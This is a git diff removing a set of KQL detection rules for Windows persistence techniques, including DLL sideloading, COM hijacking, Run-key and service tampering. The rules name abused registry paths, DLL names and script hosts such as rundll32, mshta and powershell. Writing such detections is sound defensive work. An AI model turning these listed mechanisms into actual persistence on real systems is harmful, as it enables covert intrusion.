a/Persistence/Path_To_Screensaver_Binary_Modified.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Bartlomiej Czyz @bczyz1, oscd.community -// Date: 2020/10/11 -// Level: medium -// Description: Detects value modification of registry key containing path to binary used as screensaver. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.002 -DeviceRegistryEvents -| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe"))) \ No newline at end of file diff --git a/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql b/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql deleted file mode 100644 index f6b54c27..00000000 --- a/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql +++ /dev/null 
@@ -1,13 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. -The disk cleanup manager is part of the operating system. -It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. -Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. -Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. -Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. - -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString"))) \ No newline at end of file diff --git a/Persistence/Persistence_Via_Hhctrl.ocx.kql b/Persistence/Persistence_Via_Hhctrl.ocx.kql deleted file mode 100644 index 288132ef..00000000 --- a/Persistence/Persistence_Via_Hhctrl.ocx.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx")) \ No newline at end of file diff --git a/Persistence/Persistence_Via_New_SIP_Provider.kql b/Persistence/Persistence_Via_New_SIP_Provider.kql deleted file mode 100644 index 08cf0096..00000000 --- a/Persistence/Persistence_Via_New_SIP_Provider.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion -// Tags: attack.persistence, attack.defense_evasion, attack.t1553.003 -DeviceRegistryEvents -| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll")))) \ No newline at end of file diff --git a/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql b/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql deleted file mode 100644 index c30822e7..00000000 --- a/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/22 -// Level: medium -// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt -// Tags: attack.persistence -DeviceProcessEvents -| where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" \ No newline at end of file diff --git a/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql deleted file mode 100644 index 8867fa02..00000000 --- a/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov -// Date: 2019/10/26 -// Level: high -// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/Persistence/Potential_7za.DLL_Sideloading.kql b/Persistence/Potential_7za.DLL_Sideloading.kql deleted file mode 100644 index f1cc961b..00000000 --- a/Persistence/Potential_7za.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/06/09 -// Level: low -// Description: Detects potential DLL sideloading of "7za.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql b/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql deleted file mode 100644 index 6eca1244..00000000 --- a/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Muhammad Faisal -// Date: 2023/08/02 -// Level: medium -// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. -// Tags: attack.command_and_control, attack.persistence, attack.t1219 -DeviceProcessEvents -| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe" \ No newline at end of file diff --git a/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql b/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql deleted file mode 100644 index 000b03f0..00000000 --- a/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend 
Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET")))) \ No newline at end of file diff --git a/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql b/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql deleted file mode 100644 index af503f0f..00000000 --- a/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/17 -// Level: medium -// Description: Detects PowerShell creating a binary executable or a script file. -// Tags: attack.persistence -DeviceFileEvents -| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not((((FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Windows\\Temp\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql b/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql deleted file mode 100644 index 1c5d0f3d..00000000 --- a/Persistence/Potential_CCleanerDU.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerDU.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql deleted file mode 100644 index 7d335d90..00000000 --- a/Persistence/Potential_CCleanerReactivator.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql b/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql deleted file mode 100644 index c814590c..00000000 --- a/Persistence/Potential_COM_Object_Hijacking_Via_TreatAs_Subkey_-_Registry.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Kutepov Anton, oscd.community -// Date: 2019/10/23 -// Level: medium -// Description: Detects COM object hijacking via TreatAs subkey -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "HKU" and RegistryKey contains "Classes\\CLSID" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")) \ No newline at end of file diff --git a/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql deleted file mode 100644 index 4ca5d408..00000000 --- a/Persistence/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql deleted file mode 100644 index 7d53df8f..00000000 --- a/Persistence/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbgcore.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql deleted file mode 100644 index 85e52e34..00000000 --- a/Persistence/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbghelp.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll")))) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql deleted file mode 100644 index bafb67b9..00000000 --- a/Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: medium -// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql deleted file mode 100644 index d6f4a3c3..00000000 --- a/Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/13 -// Level: medium -// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql deleted file mode 100644 index 4d8a43ae..00000000 --- a/Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/14 -// Level: medium -// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\")) \ No newline at end of file diff --git a/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql deleted file mode 100644 index 05e33118..00000000 --- a/Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\") \ No newline at end of file diff --git a/Persistence/Potential_Libvlc.DLL_Sideloading.kql b/Persistence/Potential_Libvlc.DLL_Sideloading.kql deleted file mode 100644 index 3fce189b..00000000 --- a/Persistence/Potential_Libvlc.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/04/17 -// Level: medium -// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\"))) \ No newline at end of file diff --git a/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql b/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql deleted file mode 100644 index ac641f11..00000000 --- a/Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk -// Date: 2023/06/07 -// Level: high -// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll")))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql b/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql deleted file mode 100644 index 959bd914..00000000 --- a/Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql +++ /dev/null 
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/09
-// Level: medium
-// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
-The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
-
-// Tags: attack.persistence
-DeviceFileEvents
-| where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql b/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql
deleted file mode 100644
index bfd40122..00000000
--- a/Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/09/29
-// Level: medium
-// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
-// Tags: attack.persistence, attack.t1543.003, attack.t1574.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath")))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql b/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql
deleted file mode 100644
index a1a02521..00000000
--- a/Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/06/28
-// Level: medium
-// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
-// Tags: attack.persistence, attack.t1547.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "reg" and ProcessCommandLine contains " ADD " and ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Using_DebugPath.kql b/Persistence/Potential_Persistence_Using_DebugPath.kql
deleted file mode 100644
index 0a216f80..00000000
--- a/Persistence/Potential_Persistence_Using_DebugPath.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/27
-// Level: medium
-// Description: Detects potential persistence using Appx DebugPath
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql b/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql
deleted file mode 100644
index 28f8a0f1..00000000
--- a/Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/01/01
-// Level: medium
-// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
-This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
-This can be potentially abused as a persistence mechanism.
-
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql b/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql
deleted file mode 100644
index 33dfb797..00000000
--- a/Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
-The entries found under App Paths are used primarily for the following purposes.
-First, to map an application's executable file name to that file's fully qualified path.
-Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
-
-// Tags: attack.persistence, attack.t1546.012
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_AutodialDLL.kql b/Persistence/Potential_Persistence_Via_AutodialDLL.kql
deleted file mode 100644
index bea17672..00000000
--- a/Persistence/Potential_Persistence_Via_AutodialDLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql b/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql
deleted file mode 100644
index f0cfbb39..00000000
--- a/Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
-// Tags: attack.persistence
-DeviceRegistryEvents
